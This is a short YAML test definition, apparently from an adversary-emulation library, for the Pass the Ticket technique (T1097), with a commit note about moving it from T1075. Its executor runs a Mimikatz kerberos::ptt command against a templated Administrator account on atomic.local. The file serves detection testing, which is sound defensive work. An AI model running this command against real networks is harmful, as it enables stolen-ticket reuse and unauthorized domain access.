3523ec7a1c
* Move Mimikatz PTT atomic from T1075 to T1097 * Update docs
27 lines
514 B
YAML
27 lines
514 B
YAML
---
|
|
attack_technique: T1097
|
|
display_name: Pass the Ticket
|
|
|
|
atomic_tests:
|
|
- name: Mimikatz Kerberos Ticket Attack
|
|
description: |
|
|
Similar to PTH, but attacking Kerberos
|
|
|
|
supported_platforms:
|
|
- windows
|
|
|
|
input_arguments:
|
|
user_name:
|
|
description: username
|
|
type: string
|
|
default: Administrator
|
|
domain:
|
|
description: domain
|
|
type: string
|
|
default: atomic.local
|
|
|
|
executor:
|
|
name: command_prompt
|
|
command: |
|
|
mimikatz # kerberos::ptt #{user_name}@#{domain}
|